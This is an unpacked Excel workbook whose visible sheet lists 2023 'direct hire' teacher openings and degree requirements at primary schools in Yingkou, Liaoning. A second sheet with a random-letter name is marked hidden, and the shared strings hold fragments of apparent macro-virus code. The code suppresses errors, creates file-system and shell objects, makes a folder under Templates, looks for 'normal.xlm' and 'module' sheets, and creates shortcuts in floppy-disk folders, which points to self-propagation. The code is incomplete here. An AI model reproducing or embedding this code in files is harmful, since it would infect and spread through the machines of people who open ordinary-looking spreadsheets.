
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationship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docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>
  <Override PartName="/xl/worksheets/sheet2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-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1" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml" /><Relationship Id="rId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml" /></Relationships>
</file>

<file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
<workbook xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" mc:Ignorable="x15">
  <workbookPr hidePivotFieldList="0" filterPrivacy="0"/>
  <workbookProtection workbookPassword="0000" lockWindows="0" lockStructure="0"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="27945" windowHeight="12255" tabRatio="600" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet r:id="rId3" name="YPIOTWWQSNJPJYOTRPPMYJOLHJMP" sheetId="1" state="hidden"/>
    <sheet r:id="rId4" name="附件1" sheetId="2" state="visible"/>
  </sheets>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="245" count="1">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Dim ch As Byte</t>
  </si>
  <si>
    <t xml:space="preserve">on error resume next</t>
  </si>
  <si>
    <t xml:space="preserve">Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t xml:space="preserve">Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t xml:space="preserve">myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t xml:space="preserve">fso.createfolder myfolder</t>
  </si>
  <si>
    <t xml:space="preserve">End If</t>
  </si>
  <si>
    <t xml:space="preserve">For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">hv</t>
    </r>
    <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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">if instr(ff.name,"</t>
    </r>
    <r>
      <t xml:space="preserve">软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">")&gt;0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</si>
  <si>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</si>
  <si>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 xml:space="preserve">set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">w</t>
    </r>
    <r>
      <t xml:space="preserve">.CreateShortcut(fold.path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</si>
  <si>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</si>
  <si>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 xml:space="preserve">lnk.</t>
    </r>
    <r>
      <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">W</t>
    </r>
    <r>
      <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <t xml:space="preserve">模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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附件1</t>
  </si>
  <si>
    <t xml:space="preserve">辽宁省营口市2023年高校“直招”教师岗位计划信息表</t>
  </si>
  <si>
    <t xml:space="preserve">序号</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">岗位类别
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="11.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="11.000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">名称</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="11.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">招聘
数量</t>
  </si>
  <si>
    <t xml:space="preserve">招聘单位及数量</t>
  </si>
  <si>
    <t xml:space="preserve">相关资格条件</t>
  </si>
  <si>
    <t xml:space="preserve">单位</t>
  </si>
  <si>
    <t xml:space="preserve">数量</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">学历</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="11.000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">/</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="11.000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">学位</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">专业</t>
  </si>
  <si>
    <t xml:space="preserve">资历</t>
  </si>
  <si>
    <t xml:space="preserve">其它</t>
  </si>
  <si>
    <t xml:space="preserve">语文教师</t>
  </si>
  <si>
    <t xml:space="preserve">红旗小学教育集团</t>
  </si>
  <si>
    <t xml:space="preserve"> 教育部直属师范大学、辽宁师范大学全日制师范类本科及以上学历；学士及以上学位；</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">汉（中国）语言文学（教育）
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">中国语言文学类、课程与教学论（语文）、学科教学（语文）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">取得相应  教师资格证</t>
  </si>
  <si>
    <t xml:space="preserve">2024年应届毕业生</t>
  </si>
  <si>
    <t xml:space="preserve">青年小学教育集团</t>
  </si>
  <si>
    <t xml:space="preserve">长征小学</t>
  </si>
  <si>
    <t xml:space="preserve">建设小学</t>
  </si>
  <si>
    <t xml:space="preserve">雷锋小学</t>
  </si>
  <si>
    <t xml:space="preserve">健康小学</t>
  </si>
  <si>
    <t xml:space="preserve">东风小学</t>
  </si>
  <si>
    <t xml:space="preserve">数学教师</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">数学与应用数学
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">数学类、课程与教学论（数学）、学科教学（数学）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">教育部直属师范大学、辽宁师范大学全日制师范类本科及以上学历；学士及以上学位；</t>
  </si>
  <si>
    <t xml:space="preserve">音乐教师</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">音乐学、作曲与作曲技术理论、音乐表演、音乐科学与技术
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">艺术学类</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">红旗小学教育集团
（益民小学编制）</t>
  </si>
  <si>
    <t xml:space="preserve">体育</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">体育教育、运动训练、社会体育
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">体育学类、课程与教学论（体育）、学科教学（体育）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">美术</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">美术学、艺术设计学、艺术设计
</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">美术学、设计艺术学、课程与教学论（美术）、学科教学（美术）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">心理健康</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">本科：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">心理学类</t>
    </r>
    <r>
      <rPr>
        <b val="1"/>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
研究生：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.000000"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">心理学类</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">合计</t>
  </si>
  <si>
    <t>营口市站前区2023年高校“直招”教师岗位计划信息表</t>
    <phoneticPr fontId="1" type="noConversion" alignment="left"/>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" mc:Ignorable="x14ac x16r2">
  <numFmts count="4">
    <numFmt numFmtId="41" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="176" formatCode="_ &quot;￥&quot;* #,##0.00_ ;_ &quot;￥&quot;* \-#,##0.00_ ;_ &quot;￥&quot;* \-??_ ;_ @_ "/>
    <numFmt numFmtId="177" formatCode="_ &quot;￥&quot;* #,##0_ ;_ &quot;￥&quot;* \-#,##0_ ;_ &quot;￥&quot;* \-_ ;_ @_ "/>
  </numFmts>
  <fonts count="35">
    <font>
      <sz val="12.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="12"/>
      <u val="single"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="20"/>
      <u val="single"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="18.000000"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i val="1"/>
      <sz val="11.000000"/>
      <color indexed="23"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="15.000000"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="13.000000"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <color indexed="53"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="53"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="16"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="19"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="18.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="10.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11.000000"/>
      <color indexed="8"/>
      <name val="仿宋"/>
      <charset val="134"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="14.000000"/>
      <color indexed="8"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="18.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="11.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="10.000000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10.000000"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="10.000000"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="10.000000"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.000000"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12.000000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
  </fonts>
  <fills count="19">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125">
        <fgColor indexed="64"/>
        <bgColor indexed="65"/>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8">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="43" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="41" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="2">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="3">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="3" borderId="4">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="5">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="4">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="5" borderId="6">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="7">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="8">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="6" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="7" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="8" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="9" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="10" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="11" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="12" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="13" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="3" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="5" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="14" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="14" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="15" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="8" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="3" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="16" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="11" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="11" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="17" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="18" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="14" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="14" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
